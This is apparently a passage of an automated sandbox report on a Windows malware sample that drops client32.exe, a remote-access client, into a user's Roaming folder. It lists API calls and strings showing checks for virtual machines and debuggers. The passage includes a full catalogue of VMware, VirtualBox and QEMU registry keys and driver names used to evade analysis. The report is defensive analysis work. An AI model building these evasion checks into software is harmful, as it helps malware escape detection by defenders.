Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF40F84
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	11_2_6CF3CA9B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF40B33
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	11_2_6CF3C775
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF40702
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF07C6D
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF3FD86
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,	11_2_6CF3DF35
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF3F8B5
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,	11_2_6CF3DA38

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_02291DE2 GetSystemInfo,VirtualQuery,VirtualAlloc,

0_2_02291DE2

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: hkpqXovZtS.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: TCCTL32.DLL.0.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: client32.exe, 00000003.00000003.1324848844.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1324539969.0000000005AFA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1324848844.0000000005AFA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3700828156.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005AFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: hkpqXovZtS.exe	Binary or memory string: VMWARE
Source: hkpqXovZtS.exe, 00000000.00000003.1252376873.0000000000614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +aY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
Source: hkpqXovZtS.exe	Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: client32.exe, 0000000B.00000003.1371344457.0000000001457000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: hkpqXovZtS.exe	Binary or memory string: HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0IdentifierVMWAREIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0VMWAREHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0IdentifierVMWARESYSTEM\ControlSet001\Control\SystemInformationSystemManufacturerVMWARESYSTEM\ControlSet001\Control\SystemInformationSystemProductNameVMWAREIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0VBOXHARDWARE\Description\SystemSystemBiosVersionVBOXHARDWARE\Description\SystemVideoBiosVersionVIRTUALBOXHARDWARE\Description\SystemSystemBiosDate06/23/99IdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0QEMUHARDWARE\Description\SystemSystemBiosVersionQEMUSystem32\drivers\vmmouse.sysSystem32\drivers\vmhgfs.sysSystem32\drivers\vmmemctl.sysSystem32\drivers\vmrawdsk.sysSystem32\drivers\vmusbmouse.sysHARDWARE\ACPI\DSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\RSDT\VBOX__SOFTWARE\Oracle\VirtualBox Guest AdditionsSYSTEM\ControlSet001\Services\VBoxGuestSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\vioscsiSYSTEM\ControlSet001\Services\viostorSYSTEM\ControlSet001\Services\VirtIO-FS ServiceSYSTEM\ControlSet001\Services\VirtioSerialSYSTEM\ControlSet001\Services\BALLOONSYSTEM\ControlSet001\Services\BalloonServiceSYSTEM\ControlSet001\Services\netkvmSOFTWARE\Microsoft\Virtual Machine\Guest\ParametersSOFTWARE\VMware, Inc.\VMware ToolsSOFTWARE\WineSystem\CurrentControlSet\Services\Disk\EnumqemuvirtiovmwarevboxCount%dSystem\CurrentControlSet\Enum\IDESystem\CurrentControlSet\Enum\SCSIqemuvirtiovboxxenKVMKVMKVMTCGTCGTCGTCGVMwareVMwareXenVMMXenVMMprl hypervlrpepyh vrVBoxVBoxVBoxbhyve bhyveACRNACRNACRNQNXQVMBSQGVMwareVirtualBoxvboxVBOXVMWAREVirtualBoxvboxVBOXkernel32.dllEnumSystemFirmwareTablesGetSystemFirmwareTable
Source: hkpqXovZtS.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: hkpqXovZtS.exe	Binary or memory string: System32\drivers\vmmouse.sys
Source: hkpqXovZtS.exe	Binary or memory string: vmware
Source: hkpqXovZtS.exe, 00000000.00000003.1252376873.0000000000614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools]
Source: hkpqXovZtS.exe	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: hkpqXovZtS.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
Source: hkpqXovZtS.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxService
Source: hkpqXovZtS.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
Source: hkpqXovZtS.exe	Binary or memory string: VMwareVMware
Source: TCCTL32.DLL.0.dr	Binary or memory string: VMWare
Source: hkpqXovZtS.exe	Binary or memory string: HARDWARE\ACPI\FADT\VBOX__
Source: hkpqXovZtS.exe	Binary or memory string: System32\drivers\vmhgfs.sys
Source: hkpqXovZtS.exe	Binary or memory string: System32\drivers\vmmemctl.sys

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node	graph_3-104498
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node	graph_3-104086
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node	graph_3-103985
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_004D0F9C GetCurrentProcess,CheckRemoteDebuggerPresent,

0_2_004D0F9C

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_0045467A rdtsc

0_2_0045467A

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_0046E874 IsDebuggerPresent,

0_2_0046E874

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,

3_2_110B7F30

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

0_2_02291C53

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_6CF66C74 VirtualProtect ?,-00000001,00000104,?

3_2_6CF66C74

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_0040CA7B LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040CA7B

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0045A53D mov eax, dword ptr fs:[00000030h]	0_2_0045A53D
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00460651 mov eax, dword ptr fs:[00000030h]	0_2_00460651
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0045B9D5 mov eax, dword ptr fs:[00000030h]	0_2_0045B9D5
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AAB51 mov eax, dword ptr fs:[00000030h]	0_2_022AAB51
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AAB95 mov eax, dword ptr fs:[00000030h]	0_2_022AAB95
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AABC6 mov eax, dword ptr fs:[00000030h]	0_2_022AABC6
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022A5BE9 mov eax, dword ptr fs:[00000030h]	0_2_022A5BE9

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

3_2_1117D104

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022A6F92 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_022A6F92
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0229F2CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0229F2CC
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0229FC9C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0229FC9C
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,	3_2_11031780
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	3_2_110934A0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_11162BB7
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1116EC49
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF6ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	3_2_6CF6ADFC
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_6CEF0807
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF6C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_6CF6C16F
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	11_2_110934A0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,	11_2_11031780
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_11162BB7
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_1116EC49
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF6ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	11_2_6CF6ADFC
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	11_2_6CEF0807
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF6C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	11_2_6CF6C16F

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,

3_2_110F4990

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11113190 GetKeyState,DeviceIoControl,keybd_event,

3_2_11113190

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Process created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

3_2_1109E5B0

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

3_2_1109ED30

Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	Binary or memory string: Progman

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_00410B05 cpuid

0_2_00410B05

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_11174898
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_11174B29
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_11174BCC
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoA,	3_2_1116C24E
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_11174796
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_111746A1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_1117483D
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_11174B90
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_11174A69
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	3_2_6CEF888A
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	3_2_6CEF8468
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	3_2_6CEF65F0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	3_2_6CEF85AC
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	3_2_6CEF871C
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	11_2_11174BCC
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoA,	11_2_1116C24E
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	11_2_11174796
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_111746A1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	11_2_1117483D
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	11_2_11174898
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	11_2_11174B29
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	11_2_11174B90
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	11_2_11174A69
